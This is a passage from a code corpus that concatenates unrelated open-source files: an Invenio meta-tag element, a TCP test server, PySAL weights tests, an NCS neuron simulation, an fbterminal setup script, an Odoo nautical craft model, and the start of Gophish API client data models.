            embed_url = generate_embedding_url(bfo.field('037__a'))
            additional_tags += '''<meta name="twitter:player" content="%s"/>''' % cgi.escape(embed_url, quote=True).replace('http://', 'https://', 1)
        except Exception:
            # Best effort: media_utils is CERN-specific and may be absent,
            # or the report number may not map to an embed URL.
            pass
    tags = ['<meta property="og:image" content="%s" />%s' % (image_url, image_url != image_secure_url and '\n<meta property="og:image:secure_url" content="%s" />' % image_secure_url or "") for image_url, image_secure_url in images]
    tags.extend(['<meta property="og:video" content="%s" />%s' % (video_url, video_url != video_secure_url and '\n<meta property="og:video:secure_url" content="%s" />' % video_secure_url or "") for video_url, video_secure_url in videos])
    return "\n".join(tags) + additional_tags
def escape_values(bfo):
    """Tell BibFormat whether this element's output should be escaped.

    Returning 0 requests no escaping - presumably because the element
    emits raw HTML meta markup that must reach the page verbatim.
    """
    # 0 == "do not escape" in the BibFormat escaping convention.
    return 0
| zenodo/invenio | invenio/modules/formatter/format_elements/bfe_meta_opengraph_video.py | Python | gpl-2.0 | 5,334 |
#!/usr/bin/env python
import socket
TCP_IP = ''
TCP_PORT = 5005
BUFFER_SIZE = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
conn, addr = s.accept()
print 'Starting'
print 'Connection address:', addr
while 1:
data = conn.recv(BUFFER_SIZE)
if not data: break
print "Frame received: " + data
conn.close()
| MichaelCoughlinAN/Odds-N-Ends | Python/test_server.py | Python | gpl-3.0 | 376 |
import os
import unittest
import numpy as np
from ..util import neighbor_equality
from ..weights import W
from .. import user
from ... import examples as pysal_examples
class Testuser(unittest.TestCase):
    """Regression tests for the user-facing weight constructors in
    ``pysal_core.weights.user`` (contiguity, knn, threshold and kernel
    weights built from arrays or the bundled example shapefiles)."""

    def setUp(self):
        # Queen and rook contiguity weights from the columbus example,
        # reused by the first two tests.
        self.wq = user.queen_from_shapefile(
            pysal_examples.get_path("columbus.shp"))
        self.wr = user.rook_from_shapefile(
            pysal_examples.get_path("columbus.shp"))

    def test_queen_from_shapefile(self):
        self.assertAlmostEquals(self.wq.pct_nonzero, 9.82923781757601)

    def test_rook_from_shapefile(self):
        self.assertAlmostEquals(self.wr.pct_nonzero, 8.329862557267806)

    def test_knnW_from_array(self):
        # k-nearest-neighbor weights on a regular 5x5 lattice of points.
        import numpy as np
        x, y = np.indices((5, 5))
        x.shape = (25, 1)
        y.shape = (25, 1)
        data = np.hstack([x, y])
        wnn2 = user.knnW_from_array(data, k=2)
        wnn4 = user.knnW_from_array(data, k=4)
        self.assertEquals(set(wnn4.neighbors[0]), set([1, 5, 6, 2]))
        self.assertEquals(set(wnn4.neighbors[5]), set([0, 6, 10, 1]))
        self.assertEquals(set(wnn2.neighbors[0]), set([1, 5]))
        self.assertEquals(set(wnn2.neighbors[5]), set([0, 6]))
        self.assertAlmostEquals(wnn2.pct_nonzero, 8.0)
        self.assertAlmostEquals(wnn4.pct_nonzero, 16.0)
        wnn4 = user.knnW_from_array(data, k=4)
        self.assertEquals(set(wnn4.neighbors[0]), set([1, 5, 6, 2]))
        '''
        wnn3e = pysal.knnW(data, p=2, k=3)
        self.assertEquals(set(wnn3e.neighbors[0]),set([1, 5, 6]))
        wnn3m = pysal.knnW(data, p=1, k=3)
        self.assertEquals(set(wnn3m.neighbors[0]), set([1, 5, 2]))
        '''

    def test_knnW_from_shapefile(self):
        wc = user.knnW_from_shapefile(pysal_examples.get_path("columbus.shp"))
        self.assertAlmostEquals(wc.pct_nonzero, 4.081632653061225)
        wc3 = user.knnW_from_shapefile(pysal_examples.get_path(
            "columbus.shp"), k=3)
        self.assertEquals(wc3.weights[1], [1, 1, 1])
        self.assertEquals(set(wc3.neighbors[1]), set([3, 0, 7]))
        self.assertEquals(set(wc.neighbors[0]), set([2, 1]))
        w = user.knnW_from_shapefile(pysal_examples.get_path('juvenile.shp'))
        self.assertAlmostEquals(w.pct_nonzero, 1.1904761904761904)
        w1 = user.knnW_from_shapefile(
            pysal_examples.get_path('juvenile.shp'), k=1)
        self.assertAlmostEquals(w1.pct_nonzero, 0.5952380952380952)

    def test_threshold_binaryW_from_array(self):
        # Points within the distance threshold get weight 1, others none.
        points = [(10, 10), (20, 10), (40, 10), (15, 20), (30, 20), (30, 30)]
        w = user.threshold_binaryW_from_array(points, threshold=11.2)
        self.assertEquals(w.weights, {0: [1, 1], 1: [1, 1], 2: [],
                                      3: [1, 1], 4: [1], 5: [1]})
        self.assertTrue(neighbor_equality(w, W({0: [1, 3], 1: [0, 3],
                                                2: [ ], 3: [0, 1],
                                                4: [5], 5: [4]})))

    def test_threshold_binaryW_from_shapefile(self):
        w = user.threshold_binaryW_from_shapefile(pysal_examples.get_path(
            "columbus.shp"), 0.62, idVariable="POLYID")
        self.assertEquals(w.weights[1], [1, 1])

    def test_threshold_continuousW_from_array(self):
        # Continuous (inverse-distance) weights; alpha=-2.0 squares the decay.
        points = [(10, 10), (20, 10), (40, 10), (15, 20), (30, 20), (30, 30)]
        wid = user.threshold_continuousW_from_array(points, 11.2)
        wds = {wid.neighbors[0][i]: v for i, v in enumerate(wid.weights[0])}
        self.assertEqual(wds, {1: 0.10000000000000001,
                               3: 0.089442719099991588})
        wid2 = user.threshold_continuousW_from_array(points, 11.2, alpha=-2.0)
        wds = {wid2.neighbors[0][i]: v for i, v in enumerate(wid2.weights[0])}
        self.assertEquals(wid2.weights[0], [0.01, 0.0079999999999999984])

    def test_threshold_continuousW_from_shapefile(self):
        w = user.threshold_continuousW_from_shapefile(pysal_examples.get_path(
            "columbus.shp"), 0.62, idVariable="POLYID")
        wds = {w.neighbors[1][i]:v for i,v in enumerate(w.weights[1])}
        self.assertEquals(wds, {2:1.6702346893743334, 3:1.7250729841938093})

    def test_kernelW(self):
        points = [(10, 10), (20, 10), (40, 10), (15, 20), (30, 20), (30, 30)]
        kw = user.kernelW(points)
        wds = {kw.neighbors[0][i]:v for i,v in enumerate(kw.weights[0])}
        self.assertEquals(wds, {0:1.0, 1:0.50000004999999503,
                                3:0.44098306152674649})
        np.testing.assert_array_almost_equal(
            kw.bandwidth, np.array([[20.000002],
                                    [20.000002],
                                    [20.000002],
                                    [20.000002],
                                    [20.000002],
                                    [20.000002]]))

    def test_min_threshold_dist_from_shapefile(self):
        # Smallest threshold guaranteeing every observation has a neighbor.
        f = pysal_examples.get_path('columbus.shp')
        min_d = user.min_threshold_dist_from_shapefile(f)
        self.assertAlmostEquals(min_d, 0.61886415807685413)

    def test_kernelW_from_shapefile(self):
        kw = user.kernelW_from_shapefile(pysal_examples.get_path(
            'columbus.shp'), idVariable='POLYID')
        self.assertEquals(set(kw.weights[1]), set([0.0070787731484506233,
                                                   0.2052478782400463,
                                                   0.23051223027663237,
                                                   1.0
                                                   ]))
        np.testing.assert_array_almost_equal(
            kw.bandwidth[:3], np.array([[0.75333961], [0.75333961],
                                        [0.75333961]]))

    def test_adaptive_kernelW(self):
        # Per-observation bandwidths: explicit list first, then bandwidths
        # derived automatically with a gaussian kernel.
        points = [(10, 10), (20, 10), (40, 10), (15, 20), (30, 20), (30, 30)]
        bw = [25.0, 15.0, 25.0, 16.0, 14.5, 25.0]
        kwa = user.adaptive_kernelW(points, bandwidths=bw)
        wds = {kwa.neighbors[0][i]: v for i, v in enumerate(kwa.weights[0])}
        self.assertEqual(wds, {0: 1.0, 1: 0.59999999999999998,
                               3: 0.55278640450004202,
                               4: 0.10557280900008403})
        np.testing.assert_array_almost_equal(kwa.bandwidth,
                                             np.array([[25.], [15.], [25.],
                                                       [16.], [14.5], [25.]]))
        kweag = user.adaptive_kernelW(points, function='gaussian')
        wds = {kweag.neighbors[0][i]: v for i, v in enumerate(kweag.weights[0])}
        self.assertEqual(wds, {0: 0.3989422804014327, 1: 0.26741902915776961,
                               3: 0.24197074871621341})
        np.testing.assert_array_almost_equal(kweag.bandwidth,
                                             np.array([[11.18034101],
                                                       [11.18034101],
                                                       [20.000002],
                                                       [11.18034101],
                                                       [14.14213704],
                                                       [18.02775818]]))

    def test_adaptive_kernelW_from_shapefile(self):
        kwa = user.adaptive_kernelW_from_shapefile(
            pysal_examples.get_path('columbus.shp'))
        wds = {kwa.neighbors[0][i]: v for i, v in enumerate(kwa.weights[0])}
        self.assertEquals(wds, {0: 1.0, 2: 0.03178906767736345,
                                1: 9.9999990066379496e-08})
        np.testing.assert_array_almost_equal(kwa.bandwidth[:3],
                                             np.array([[0.59871832],
                                                       [0.59871832],
                                                       [0.56095647]]))

    def test_build_lattice_shapefile(self):
        of = "lattice.shp"
        user.build_lattice_shapefile(20, 20, of)
        w = user.rook_from_shapefile(of)
        self.assertEquals(w.n, 400)
        # NOTE(review): only .shp and .shx are removed; if
        # build_lattice_shapefile also writes a .dbf it is left behind —
        # confirm and clean up if so.
        os.remove('lattice.shp')
        os.remove('lattice.shx')
# Build the suite at import time so external runners can reuse it.
suite = unittest.TestLoader().loadTestsFromTestCase(Testuser)

if __name__ == '__main__':
    unittest.TextTestRunner().run(suite)
| sjsrey/pysal_core | pysal_core/weights/tests/test_user.py | Python | bsd-3-clause | 8,208 |
#!/usr/bin/python
import os, sys
#specify the location of ncs.py in ncs_lib_path
ncs_lib_path = ('../../../../')
sys.path.append(ncs_lib_path)
import ncs
def run(argv):
    """Simulate one Izhikevich "regular spiking" neuron for 1 second in
    NCS, driving it with a rectangular current and writing the voltage
    report to ./regular_spiking_izh.txt.

    ``argv`` is forwarded to ``sim.init`` (command-line arguments)."""
    sim = ncs.Simulation()
    # Izhikevich model parameters for the regular-spiking cell type,
    # with initial recovery variable u and membrane potential v.
    regular_spiking_parameters = sim.addNeuron("regular_spiking","izhikevich",
                                {
                                 "a": 0.02,
                                 "b": 0.2,
                                 "c": -65.0,
                                 "d": 8.0,
                                 "u": -12.0,
                                 "v": -60.0,
                                 "threshold": 30
                                })
    group_1=sim.addNeuronGroup("group_1",1,regular_spiking_parameters,None)
    if not sim.init(argv):
        print "failed to initialize simulation."
        return
    input_parameters = {
                   "amplitude":10
                  }
    # Rectangular current applied to the group from t=0.01 to t=1.0
    # (middle argument presumably a probability/count of 1 — TODO
    # confirm against the ncs addStimulus API).
    sim.addStimulus("rectangular_current", input_parameters, group_1, 1, 0.01, 1.0)
    # Record neuron voltage over the whole run and dump it as ASCII.
    voltage_report=sim.addReport("group_1", "neuron", "neuron_voltage", 1, 0.0, 1.0)
    voltage_report.toAsciiFile("./regular_spiking_izh.txt")
    sim.run(duration=1.0)
    return

if __name__ == "__main__":
    run(sys.argv)
| BrainComputationLab/ncs | python/samples/models/izh/regular_spiking_izh.py | Python | bsd-2-clause | 938 |
from gpc.gpc import *
from gpc import spec_reader
def main():
    """Run the demo pipeline to build target 'c', then report which
    logged run(s) produced the resulting file."""
    event_log = Log('log')
    store = Storage('storage')
    dependency_graph = spec_reader.graph_from_spec('simple.yaml')

    Runner(event_log, store, dependency_graph).make('c')

    runs = event_log.get_provenance(digest_file('c'))
    print('The file was produced by %i run(s):' % len(runs))
    for run in runs:
        print(run)


if __name__ == '__main__':
    main()
from setuptools import setup
import os
setup(
    name='fbterminal',
    version='0.2.1',
    description='Access Facebook on Terminal',
    packages=['fbterminal'],
    license='MIT',
    author='Akash Kothawale',
    author_email='io@decached.com',
    url='http://decached.com/fbterminal',
    install_requires='requests>=1.2.3',
    entry_points={'console_scripts': ['fbterminal = fbterminal.terminal:command_line_runner']},
    data_files=[(os.path.expanduser('~') + '/', ['fbterminal/.fbterminal'])]
)

# When installed via sudo, ~/.fbterminal ends up owned by root; hand it
# back to the invoking user.  Use subprocess with an argument list (no
# shell) so the login name is never interpreted by a shell, and expand
# '~' explicitly because there is no shell to do it for us.
import subprocess
subprocess.call(['chown', os.getlogin(), os.path.expanduser('~/.fbterminal')])
| decached/fbterminal | setup.py | Python | mit | 564 |
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in module root
# directory
##############################################################################
import time
from datetime import datetime, date, timedelta
from dateutil.relativedelta import relativedelta
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
from openerp import fields as fields_new
from openerp import models, api
from openerp import tools
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
class craft(models.Model):
# class craft(osv.osv):
    """Extensions to ``nautical.craft``: latest role-book dates, owner-aware
    display name, pricelist-based pricing/tax totals, image handling,
    state-change records and an owner-debt dispatch check."""
    _inherit = 'nautical.craft'
    # Mirror the most recent role book (ordered by estimated departure
    # date, descending) and its dates onto the craft.
    @api.one
    @api.depends('role_book_ids.estimated_dep_date','role_book_ids.est_arrival_date','role_book_ids')
    def _cal_role(self):
        role_books = self.env['nautical.role_book'].search([('craft_id','=',self.id)], order='estimated_dep_date desc')
        if role_books:
            self.role_book_id = role_books[0]
            self.estimated_dep_date = role_books[0].estimated_dep_date
            self.est_arrival_date = role_books[0].est_arrival_date
        else:
            self.role_book_id = False
    # Stored computed fields kept in sync by _cal_role().
    role_book_id = fields_new.Many2one(
        'nautical.role_book',
        string='Role book',
        compute='_cal_role',
        store=True
    )
    estimated_dep_date = fields_new.Datetime(
        # related='role_book_id.estimated_dep_date',
        compute='_cal_role',
        string='Estimated Departure Date',
        store=True
    )
    est_arrival_date = fields_new.Datetime(
        compute='_cal_role',
        # related='role_book_id.est_arrival_date',
        string='Estimated Arrival Date',
        store=True
    )
    company_id = fields_new.Many2one(
        'res.company',
        'Company',
        required=True,
        default=lambda self: self.env.user.company_id,
    )
    def name_get(self, cr, uid, ids, context=None):
        # always return the full hierarchical name
        # Display name is "<craft name> - <owner name>" when both exist.
        res = {}
        for line in self.browse(cr, uid, ids):
            if line.name and line.owner_id.name:
                sep = ' - '
            else:
                sep = ''
            res[line.id] = (line.name or '')+ sep + line.owner_id.name
        return res.items()
    def name_search(self, cr, user, name='', args=None, operator='ilike', context=None, limit=100):
        # Match the craft name first; if the limit is not yet reached,
        # also match against the owner's name.
        if not args:
            args = []
        ids = set()
        if name:
            ids.update(self.search(cr, user, args + [('name',operator,name)], limit=(limit and (limit-len(ids)) or False) , context=context))
            if not limit or len(ids) < limit:
                ids.update(self.search(cr, user, args + [('owner_id.name',operator,name)], limit=limit, context=context))
            ids = list(ids)
        else:
            ids = self.search(cr, user, args, limit=limit, context=context)
        result = self.name_get(cr, user, ids, context=context)
        return result
    def _amount_all(self, cr, uid, ids, field_name, arg, context=None):
        # Compute price_unit / amount_untaxed / amount_tax / amount_total
        # per craft, pricing the craft's product (qty 1) on the owner's
        # pricelist at today's date and applying the craft's taxes.
        tax_obj = self.pool.get('account.tax')
        cur_obj = self.pool.get('res.currency')
        res = {}
        date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
        for record in self.browse(cr, uid, ids, context=context):
            res[record.id] = {
                'amount_untaxed': 0.0,
                'amount_tax': 0.0,
                'amount_total': 0.0,
                'price_unit': 0.0,
            }
            # Get price
            price_unit = self.pool.get('product.pricelist').price_get(cr, uid, [record.pricelist_id.id],
                    record.product_id.id, 1.0, record.owner_id.id, {
                        'uom': record.product_id.uom_id.id,
                        # 'uom': result.get('product_uom'),
                        'date': date_order,
                        })[record.pricelist_id.id]
            # [record.pricelist_id.id]
            val = 0.0
            cur = record.owner_id.property_product_pricelist.currency_id
            # res[record.id]['price_unit'] = 0.0
            res[record.id]['price_unit'] = cur_obj.round(cr, uid, cur, price_unit)
            price = price_unit * (1 - (record.discount or 0.0) / 100.0)
            # price = record.price_unit * (1 - (record.discount or 0.0) / 100.0)
            # price = 0.0
            taxes = tax_obj.compute_all(cr, uid, record.tax_id, price, 1, record.product_id, record.owner_id)
            res[record.id]['amount_untaxed'] = cur_obj.round(cr, uid, cur, price)
            for c in taxes['taxes']:
                val += c.get('amount', 0.0)
            res[record.id]['amount_tax'] = cur_obj.round(cr, uid, cur, val)
            res[record.id]['amount_total'] = cur_obj.round(cr, uid, cur, taxes['total_included'])
        return res
    def _get_image(self, cr, uid, ids, name, args, context=None):
        # Functional getter for the resized image fields.
        result = dict.fromkeys(ids, False)
        for obj in self.browse(cr, uid, ids, context=context):
            result[obj.id] = tools.image_get_resized_images(obj.image, avoid_resize_medium=True)
        return result
    def _get_location_string(self, cr, uid, ids, name, args, context=None):
        # Comma-separated list of the craft's location references.
        result = {}
        for obj in self.browse(cr, uid, ids, context=context):
            loc_name = ''
            for location in obj.location_ids:
                loc_name += location.complete_ref + ', '
            result[obj.id] = loc_name
        return result
    # def _cal_role(self, cr, uid, ids, name, args, context=None):
    #     result = {}
    #     role_obj=self.pool['nautical.role_book']
    #     for craft in self.browse(cr, uid, ids, context=context):
    #         role_book_id = False
    #         role_book_ids = role_obj.search(cr, uid, [('craft_id','=',craft.id)], order='estimated_dep_date desc', context=context)
    #         if role_book_ids:
    #             role_book_id = role_book_ids[0]
    #         result[craft.id] = role_book_id
    #     return result
    def _set_image(self, cr, uid, id, name, value, args, context=None):
        # Functional setter: store the big-sized version of the image.
        return self.write(cr, uid, [id], {'image': tools.image_resize_image_big(value)}, context=context)
    # Old-API (osv) column definitions kept alongside the new-API fields.
    _columns = {
        # Images
        'image': fields.binary("Image",
            help="This field holds the image used as image for the craft, limited to 1024x1024px."),
        'image_medium': fields.function(_get_image, fnct_inv=_set_image,
            string="Medium-sized image", type="binary", multi="_get_image",
            store={
                'nautical.craft': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
            },
            help="Medium-sized image of the craft. It is automatically "\
                 "resized as a 128x128px image, with aspect ratio preserved, "\
                 "only when the image exceeds one of those sizes. Use this field in form views or some kanban views."),
        'image_small': fields.function(_get_image, fnct_inv=_set_image,
            string="Small-sized image", type="binary", multi="_get_image",
            store={
                'nautical.craft': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
            },
            help="Small-sized image of the craft. It is automatically "\
                 "resized as a 64x64px image, with aspect ratio preserved. "\
                 "Use this field anywhere a small image is required."),
        # Others
        'craft_type': fields.related('product_id', 'craft_type', type='char', string='Craft Type Code',),
        'partner_payment_earliest_due_date': fields.related('owner_id', 'payment_earliest_due_date', type='char', string='Worst Due Date',),
        'locations_string': fields.function(_get_location_string, string='Locations', type='char'),
        # TODO. Could be good to add states restricion "readonly=True, states={'draft': [('readonly', False)]}"" to all this fields
        'account_invoice_line_ids': fields.one2many('account.invoice.line', 'craft_id', string='Account Invoice Lines', readonly=True),
        'price_unit': fields.function(_amount_all, string='Price', digits_compute= dp.get_precision('Product Price'), multi='sums'),
        'amount_untaxed': fields.function(_amount_all, string='Untaxed Amount', digits_compute= dp.get_precision('Account'), multi='sums'),
        'amount_tax': fields.function(_amount_all, string='Taxes', digits_compute= dp.get_precision('Account'), multi='sums'),
        'amount_total': fields.function(_amount_all, string='Total', digits_compute= dp.get_precision('Account'), multi='sums'),
        'discount': fields.float('Discount (%)', digits_compute= dp.get_precision('Discount'),),
        'tax_id': fields.many2many('account.tax', 'craft_tax_rel', 'craft_id', 'tax_id', 'Taxes',),
        'pricelist_id': fields.related('owner_id', 'property_product_pricelist', type='many2one', relation='product.pricelist', string='Pricelist'),
        'fiscal_position': fields.related('owner_id', 'property_account_position', type='many2one', relation='account.fiscal.position', string='Fiscal Position'),
        'currency_id': fields.related('pricelist_id', 'currency_id', type="many2one", relation="res.currency", string="Currency", readonly=True, required=False),
        # ADDED TRACKING
        # Tracking on location_ids, being m2m, only records the raw ids, which is not useful
        # 'location_ids': fields.one2many('nautical.location', 'craft_id', string='Location', states={'draft':[('readonly', True)],'permanent_cancellation':[('readonly', True)]}, context={'default_type':'normal'}, domain=[('type','=','normal')], track_visibility='onchange'),
        'owner_id': fields.many2one('res.partner', string='Owner', readonly=True, states={'draft':[('readonly', False)]}, ondelete='cascade', required=True, track_visibility='onchange'),
        # (sic) 'lenght' is the stored column name; fixing the typo would
        # require a database migration.
        'lenght': fields.float(string='Lenght'),
        'breadth': fields.float(string='Breadth'),
    }
    _defaults = {
    }
    # _order = 'estimated_dep_date, est_arrival_date, id'
    def create(self, cr, uid, vals, context=None):
        # Assign the next 'craft_reference' sequence value when no
        # reference is supplied (placeholder '/').
        if vals.get('ref','/')=='/':
            vals['ref'] = self.pool.get('ir.sequence').get(cr, uid, 'craft_reference') or '/'
        return super(craft, self).create(cr, uid, vals, context=context)
    def write(self, cr, uid, ids, vals, context=None):
        # print ('context', context)
        # Every state change (except 'check_due') creates a craft record
        # entry and stamps last_action_date.
        if 'state' in vals:
            # self.wkf_preconditions(cr, uid, ids, vals, context=context)
            # NOTE(review): `not in 'check_due'` is a *substring* test —
            # e.g. state 'check' would be treated as contained; probably
            # meant `!= 'check_due'`.  Confirm before changing.
            if vals['state'] not in 'check_due':
                self.create_craft_record(cr, uid, ids, vals, context=context)
            vals['last_action_date'] = datetime.now()
        ret = super(craft, self).write(cr, uid, ids, vals, context=context)
        return ret
    # TODO: move this method to the nautical_portal module
    def action_reserver(self, cr, uid, ids, context=None):
        # Reserve the boat through the portal only if the owner passes
        # the debt check.
        reserve_obj = self.pool['nautical_portal.reserve_boat']
        if self.test_partner_dispatch(cr, 1, ids):
            reserve_obj.reserve(cr, uid, ids, context=None)
        else:
            raise osv.except_osv(_('Error!'),
                _('Member does not have the fee per day.') )
        return True
    def craft_request(self, cr, uid, ids, request_type, partner_id, context=None):
        # Map a portal request type to the target craft state and record
        # who asked for it (aux_requestor_id is consumed by write()).
        # NOTE(review): an unrecognised request_type leaves `state`
        # unbound (UnboundLocalError) — confirm callers only pass the
        # four types handled below.
        if request_type == 'sail':
            state = 'to_dispatch'
        elif request_type== 'transitional_retirement':
            state = 'transitional_retirement'
        elif request_type== 'in_reparation':
            state = 'in_reparation'
        elif request_type== 'in_custody':
            state = 'in_custody'
        self.write(cr, uid, ids, {'aux_requestor_id': partner_id, 'state': state}, context)
        # for craft_id in ids:
        #     workflow.trg_validate(uid, 'nautical.craft', craft_id, signal, cr)
    def create_craft_record(self, cr, uid, ids, vals, context=None):
        # Log one nautical.craft_record per craft for the state change in
        # `vals`, then clear the transient requestor.
        craft_record_obj = self.pool.get('nautical.craft_record')
        context = context or {}
        # requestor_id = context.get('requestor_id', False)
        for craft in self.browse(cr, uid, ids, context):
            record_vals = {
                'craft_id': craft.id,
                # 'date': ,
                # 'user_id': ,
                'requestor_id': craft.aux_requestor_id.id,
                'type': vals['state'] or '',
            }
            craft_record_obj.create(cr, uid, record_vals, context=context)
        self.write(cr, uid, ids, {'aux_requestor_id':False}, context)
    def wkf_preconditions(self, cr, uid, ids, vals, context=None):
        # Hook for workflow preconditions; currently a no-op unless a
        # state is being written.
        if 'state' not in vals:
            return
        # if vals['state'] == 'contracted':
            # self.check_contract_permanent_cancellation(cr, uid, ids, context=context)
    def onchange_partner_id(self, cr, uid, ids, part, context=None):
        # On owner change, propose the owner's pricelist and fiscal
        # position to the form.
        if not part:
            return {'value': {'pricelist_id': False, 'fiscal_position': False,}}
        part = self.pool.get('res.partner').browse(cr, uid, part, context=context)
        pricelist = part.property_product_pricelist and part.property_product_pricelist.id or False
        # payment_term = part.property_payment_term and part.property_payment_term.id or False
        fiscal_position = part.property_account_position and part.property_account_position.id or False
        val = {
            # 'payment_term': payment_term,
            'fiscal_position': fiscal_position,
        }
        if pricelist:
            val['pricelist_id'] = pricelist
        return {'value': val}
    def product_id_change(self, cr, uid, ids, pricelist, product_id, partner_id=False, update_tax=True, fiscal_position=False, context=None):
        # Partner would be the owner
        # On product change, refresh taxes, uom, craft type and the
        # pricelist price; collect any user-facing warnings.
        context = context or {}
        warning = {}
        product_uom_obj = self.pool.get('product.uom')
        partner_obj = self.pool.get('res.partner')
        product_obj = self.pool.get('product.product')
        context = {'partner_id': partner_id}
        warning_msgs = ''
        result = {}
        domain = {}
        if product_id:
            if not partner_id:
                raise osv.except_osv(_('No Owner Defined!'), _('Before choosing a product,\n select an owner.'))
            product_obj = product_obj.browse(cr, uid, product_id, context=context)
            fpos = fiscal_position and self.pool.get('account.fiscal.position').browse(cr, uid, fiscal_position) or False
            if update_tax: #The quantity only have changed
                result['tax_id'] = self.pool.get('account.fiscal.position').map_tax(cr, uid, fpos, product_obj.taxes_id)
            result['product_uom'] = product_obj.uom_id.id
            result['craft_type'] = product_obj.craft_type
            date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
            if not pricelist:
                warn_msg = _('You have to select an owner!\n'
                        'Please set one before choosing a product.')
                warning_msgs += _("No Pricelist ! : ") + warn_msg +"\n\n"
            else:
                price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],
                        product_id, 1.0, partner_id, {
                            'uom': result.get('product_uom'),
                            'date': date_order,
                            })[pricelist]
                if price is False:
                    warn_msg = _("Cannot find a pricelist line matching this product and quantity.\n"
                            "You have to change either the product, the quantity or the pricelist.")
                    warning_msgs += _("No valid pricelist line found ! :") + warn_msg +"\n\n"
                else:
                    result.update({'price_unit': price})
            if warning_msgs:
                warning = {
                    'title': _('Configuration Error!'),
                    'message' : warning_msgs
                }
        else:
            result['product_uom'] = False
            result['craft_type'] = False
            result['price_unit'] = False
            result['tax_id'] = False
        return {'value': result, 'domain': domain, 'warning': warning}
    def button_dummy(self, cr, uid, ids, context=None):
        # No-op button used to trigger onchange recomputation from views.
        return True
    def test_partner_dispatch(self, cr, uid, ids, *args):
        # Allow dispatch unless the owner's earliest unpaid due date is
        # older than the company's debt limit (in months).  A limit of 0
        # or unset means the check always passes.
        user_obj=self.pool['res.users']
        company_obj = self.pool['res.company']
        craft = self.browse(cr, uid, ids, context=None)[0]
        # NOTE(review): these ids come from a res.users search but are
        # then browsed as res.company records — this looks like a bug;
        # confirm against the intended company lookup.
        company_ids = user_obj.search(cr, uid, [('company_id','=',craft.owner_id.company_id.id)], context=None)
        company_id=company_obj.browse(cr, uid, company_ids, context=None)[0]
        months_debt=company_id.debt_limit_months
        # Dispatch is allowed when there is no due date at all or the
        # earliest one is not older than the tolerance date.
        if months_debt == 0 or not months_debt:
            return True
        else:
            tolerance_date = (datetime.today() + relativedelta(months=-months_debt)).strftime('%Y-%m-%d')
            for record in self.browse(cr, uid, ids, context={}):
                if not record.owner_id.payment_earliest_due_date or record.owner_id.payment_earliest_due_date >= tolerance_date:
                    return True
                else:
                    return False
    def action_set_stored(self, cr, uid, ids, *args):
        self.write(cr, uid, ids, {'state': 'stored'})
        return True
    def action_set_picked(self, cr, uid, ids, *args):
        self.write(cr, uid, ids, {'state': 'picked'})
        return True
    def action_set_dispached(self, cr, uid, ids, *args):
        self.write(cr, uid, ids, {'state': 'sailing'})
        return True
| ingadhoc/odoo-nautical | nautical_x/craft.py | Python | agpl-3.0 | 17,753 |
from datetime import datetime
from dateutil.tz import tzlocal
import json as _json
import dateutil.parser
def parse_date(datestr):
    """ Parses an ISO 8601 formatted date from Gophish """
    # dateutil copes with timezone offsets and fractional seconds that a
    # fixed strptime format string would not.
    return dateutil.parser.parse(datestr)
class Model(object):
    """Base class for Gophish API resources.

    Subclasses declare ``_valid_properties`` (property name -> default)
    and override :meth:`parse`.
    """

    def __init__(self):
        self._valid_properties = {}

    @staticmethod
    def _encode(value):
        """Convert one property value into a JSON-serializable form."""
        if isinstance(value, datetime):
            return value.isoformat()
        if isinstance(value, list):
            return [element.as_dict() for element in value]
        # Anything truthy that is not a plain scalar or dict is assumed
        # to be another Model and serialized recursively.
        if value and not isinstance(value, (int, float, str, dict)):
            return value.as_dict()
        return value

    def as_dict(self):
        """Return a dict of this resource's properties, omitting falsy ones."""
        serialized = {}
        for name in self._valid_properties:
            encoded = self._encode(getattr(self, name))
            if encoded:
                serialized[name] = encoded
        return serialized

    @classmethod
    def parse(cls, json):
        """Parse a JSON object into a model instance."""
        raise NotImplementedError
class Campaign(Model):
    """A Gophish campaign, including its results and event timeline."""

    _valid_properties = {
        'id': None,
        'name': None,
        'created_date': datetime.now(tzlocal()),
        'launch_date': datetime.now(tzlocal()),
        'completed_date': None,
        'template': None,
        'page': None,
        'results': [],
        'status': None,
        'timeline': [],
        'smtp': None,
        'url': None,
        'groups': [],
        'profile': None
    }

    def __init__(self, **kwargs):
        """Create a campaign, defaulting any property not in kwargs."""
        for name, default in Campaign._valid_properties.items():
            setattr(self, name, kwargs.get(name, default))

    @classmethod
    def parse(cls, json):
        """Build a Campaign from an API response dict."""
        campaign = cls()
        for name, value in json.items():
            # TODO Add date parsing
            if name == 'results':
                setattr(campaign, name, [Result.parse(r) for r in value])
            elif name == 'timeline':
                if value is not None:
                    setattr(campaign, name,
                            [TimelineEntry.parse(e) for e in value])
            elif name == 'template':
                setattr(campaign, name, Template.parse(value))
            elif name == 'page':
                setattr(campaign, name, Page.parse(value))
            elif name == 'smtp':
                setattr(campaign, name, SMTP.parse(value))
            elif name in cls._valid_properties:
                setattr(campaign, name, value)
        return campaign
class CampaignSummaries(Model):
    """Wrapper for the campaign-summaries endpoint: a total plus a list."""

    _valid_properties = {'total': None, 'campaigns': None}

    def __init__(self):
        """Create an empty summaries wrapper with all-None properties."""
        for name, default in CampaignSummaries._valid_properties.items():
            setattr(self, name, default)

    @classmethod
    def parse(cls, json):
        """Build a CampaignSummaries from an API response dict."""
        wrapper = cls()
        for name, value in json.items():
            # TODO Add date parsing
            if name == 'campaigns':
                setattr(wrapper, name,
                        [CampaignSummary.parse(s) for s in value])
            elif name in cls._valid_properties:
                setattr(wrapper, name, value)
        return wrapper
class CampaignSummary(Model):
    """High-level dates, status and stats for a single campaign."""

    _valid_properties = {
        'id': None,
        'name': None,
        'status': None,
        'created_date': None,
        'launch_date': None,
        'completed_date': None,
        'stats': None
    }

    def __init__(self):
        """Create an empty summary with all properties defaulted."""
        for name, default in CampaignSummary._valid_properties.items():
            setattr(self, name, default)

    @classmethod
